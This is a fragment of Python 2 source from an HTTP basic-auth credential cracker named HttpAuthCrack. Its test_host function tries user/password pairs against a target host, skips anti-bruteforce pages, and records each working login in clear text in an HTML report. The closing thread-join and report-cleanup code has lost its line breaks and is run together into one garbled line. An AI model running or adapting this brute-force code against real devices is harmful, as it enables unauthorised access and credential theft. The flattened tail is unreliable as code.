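def test_host(host, user, passwd):
    """Try one user/password pair against the HTTP basic auth of *host*.

    Args:
        host: URL of the device or service being checked.
        user: User name to present.
        passwd: Password to present.

    Returns:
        -1 when the caller should stop trying this host: either the
        credentials were accepted (a row is appended to the HTML report),
        or the body contained 'HTTP 401' and the hit was discarded as a
        probable false positive.
        0 when the request failed. Any exception, including the HTTPError
        urllib2 raises for a rejected login, is logged and mapped to 0.
    """
    # Local import so the block does not depend on the file's import header.
    from xml.sax.saxutils import escape, quoteattr

    try:
        Log.info("["+host+"] Checking %s/%s" % (user, passwd))
        passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
        passman.add_password(None, host, user, passwd)
        authhandler = urllib2.HTTPBasicAuthHandler(passman)
        opener = urllib2.build_opener(authhandler)
        urllib2.install_opener(opener)
        source = urllib2.urlopen(host, timeout=5)
        # The original guarded on len(str(source)) > 0, which is always
        # true for a response object, so the guard and the unreachable
        # "return 0" behind it are dropped.
        try:
            # Some devices show an html page after a number of tries to
            # avoid bruteforce. We discard those.
            html = str(source.read())
        finally:
            # Release the connection even if reading the body fails.
            source.close()

        if html.find('HTTP 401') > 0:
            Log.warn("["+host+"] HTTP 401 found in html. Possibly false positive. Omitting from output")
            return -1

        Log.success("Access granted with "+user+"/"+passwd+" to "+host)

        # The values are escaped before they go into the report: a host,
        # user name or password containing <, >, & or quotes would
        # otherwise be parsed as markup when the report is opened in a
        # browser. quoteattr() also supplies the quotes the href lacked.
        row = ("<tr><td><a href="+quoteattr(host)+" target=\"_blank\">"
               + escape(host)+"</a></td><td>"+escape(user)+"</td><td>"
               + escape(passwd)+"</td></tr>")
        # NOTE: the row stores an accepted credential in clear text, so
        # the report file needs the same handling as any other secret.
        # "with" releases the lock even when the write raises; the bare
        # acquire()/release() pair left it held and blocked every other
        # writer.
        with outputLock:
            output.writelines(row)
        return -1  # return -1 to stop looking in a host when we have access to.
    except Exception as e:
        Log.err("["+host+"] Error: %s" % e)
        return 0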
# Wait for all trheads to complete for t in threads: t.join() # End html log and close the file aux = open(RFOOTER,"r") outputLock.acquire() output.writelines("</table>") output.writelines("<br><br><div>Report generated by HttpAuthCrack v"+version+" on "+datetime.datetime.now().strftime("%Y/%m/%d %H:%M")+"</div>") output.writelines(aux.read()) outputLock.release() aux.close() output.close() except KeyboardInterrupt, e: Log.warn("Terminating all Threads due to Keyboard Interrupt...") outputLock.acquire() output.writelines("<h2>Execution stoped by user!!!</h2>") outputLock.release() exitFlag = 1 # End html log and close the file aux = open(RFOOTER,"r") outputLock.acquire() output.writelines(aux.read()) outputLock.release() aux.close() output.close() print "Exiting Main Thread"